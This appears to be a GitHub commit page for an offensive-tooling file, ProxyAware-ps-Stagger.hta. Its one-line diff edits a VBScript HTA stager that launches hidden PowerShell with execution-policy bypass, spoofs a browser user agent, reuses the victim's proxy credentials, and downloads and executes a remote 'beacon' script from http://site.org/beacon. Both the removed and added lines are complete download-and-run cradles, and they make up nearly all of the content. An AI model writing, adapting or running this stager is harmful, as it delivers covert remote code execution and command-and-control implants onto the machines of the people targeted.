Skip to content

Commit 1e02142

Browse files
Update ProxyAware-ps-Stagger.hta
1 parent 14e8880 commit 1e02142

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

ProxyAware-ps-Stagger.hta

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,7 @@
22
Function var_func()
33
Dim var_shell
44
Set var_shell = CreateObject("Wscript.Shell")
5-
var_shell.run "cmd.exe /c powershell.exe -exec bypass -w hidden -command $wc = New-Object System.Net.Webclient; $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64;Trident/7.0; AS; rv:11.0) Like Gecko'); $wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; $wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX ($wc.downloadstring('http://site.org/beacon'))", 0, true
5+
var_shell.run "powershell.exe -exec bypass -w hidden -command $wc = New-Object System.Net.Webclient; $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64;Trident/7.0; AS; rv:11.0) Like Gecko'); $wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; $wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX ($wc.downloadstring('http://site.org/beacon'))", 0, true
66
# Beacon is a Fully Staged .ps1
77
End Function
88

0 commit comments

Comments
 (0)